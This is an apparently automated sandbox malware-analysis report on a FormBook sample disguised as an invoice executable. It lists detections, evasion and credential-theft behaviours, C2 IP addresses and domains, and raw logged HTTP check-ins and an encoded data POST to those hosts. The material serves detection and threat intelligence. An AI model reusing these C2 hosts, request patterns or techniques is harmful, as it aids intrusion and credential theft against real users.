Windows Analysis Report
HYCO_Invoices MS2 & MS3.exe

Overview

General Information

Sample name: HYCO_Invoices MS2 & MS3.exe
Analysis ID: 1427199
MD5: 96fe3d00e8b2ba36dfb240a004ab28e1
SHA1: 757169009af1210acab01e9a2385e5cca4b94f20
SHA256: 57b81292b61a36171a2ad822d255aae878a8f9ca187efb43da94c7865c8388c4
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: HYCO_Invoices MS2 & MS3.exe ReversingLabs: Detection: 47%
Source: HYCO_Invoices MS2 & MS3.exe Virustotal: Detection: 40% Perma Link
Yara detected FormBook
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: HYCO_Invoices MS2 & MS3.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HYCO_Invoices MS2 & MS3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: replace.pdb source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: replace.pdbGCTL source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820275052.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000000.1974653157.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: HYCO_Invoices MS2 & MS3.exe, HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\replace.exe Code function: 5_2_00E1BC00 FindFirstFileW,FindNextFileW,FindClose, 5_2_00E1BC00
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\replace.exe Code function: 4x nop then xor eax, eax 5_2_00E09460
Source: C:\Windows\SysWOW64\replace.exe Code function: 4x nop then pop edi 5_2_00E1210D

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49738 -> 79.98.25.1:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 91.195.240.117:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49747 -> 64.190.62.22:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49751 -> 217.76.128.34:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49759 -> 178.211.137.59:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.www60270.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.117 91.195.240.117
Source: Joe Sandbox View IP Address: 79.98.25.1 79.98.25.1
Source: Joe Sandbox View IP Address: 217.76.128.34 217.76.128.34
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View ASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: TIS-DIALOG-ASRU TIS-DIALOG-ASRU
Source: Joe Sandbox View ASN Name: NBS11696US NBS11696US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /aleu/?QbZ=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.choosejungmann.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /aleu/?QbZ=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /aleu/?QbZ=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic HTTP traffic detected: GET /aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: unknown DNS traffic detected: queries for: www.maxiwalls.com
Source: unknown HTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.choosejungmann.comOrigin: http://www.choosejungmann.comContent-Type: application/x-www-form-urlencodedContent-Length: 200Cache-Control: max-age=0Connection: closeReferer: http://www.choosejungmann.com/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 51 62 5a 3d 32 75 61 31 75 55 52 32 78 5a 64 6c 62 75 34 5a 68 70 79 4d 39 69 6f 46 61 4b 69 5a 4e 63 50 4f 71 34 30 43 4a 39 72 6c 59 4c 6a 2b 49 4d 4a 62 63 43 6b 73 47 35 72 37 70 37 38 33 39 47 32 6b 61 39 63 33 54 39 78 67 57 47 57 49 4d 41 63 70 64 52 42 47 71 42 63 31 4d 32 55 64 56 53 30 43 6e 42 34 4a 7a 57 63 66 41 6c 50 50 57 38 2b 71 4d 79 4f 51 67 36 6c 77 63 6b 35 32 69 46 42 55 6f 36 48 4e 44 53 59 53 69 34 31 44 75 7a 2f 6f 65 45 48 66 35 41 6a 72 70 47 36 43 45 47 51 72 46 66 67 38 30 64 47 49 4c 4b 4d 6d 4c 74 67 4a 6a 63 53 56 54 4e 36 4f 6c 63 54 79 42 69 59 69 41 41 3d 3d Data Ascii: QbZ=2ua1uUR2xZdlbu4ZhpyM9ioFaKiZNcPOq40CJ9rlYLj+IMJbcCksG5r7p7839G2ka9c3T9xgWGWIMAcpdRBGqBc1M2UdVS0CnB4JzWcfAlPPW8+qMyOQg6lwck52iFBUo6HNDSYSi41Duz/oeEHf5AjrpG6CEGQrFfg80dGILKMmLtgJjcSVTN6OlcTyBiYiAA==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:02 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:05 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:08 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:11 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 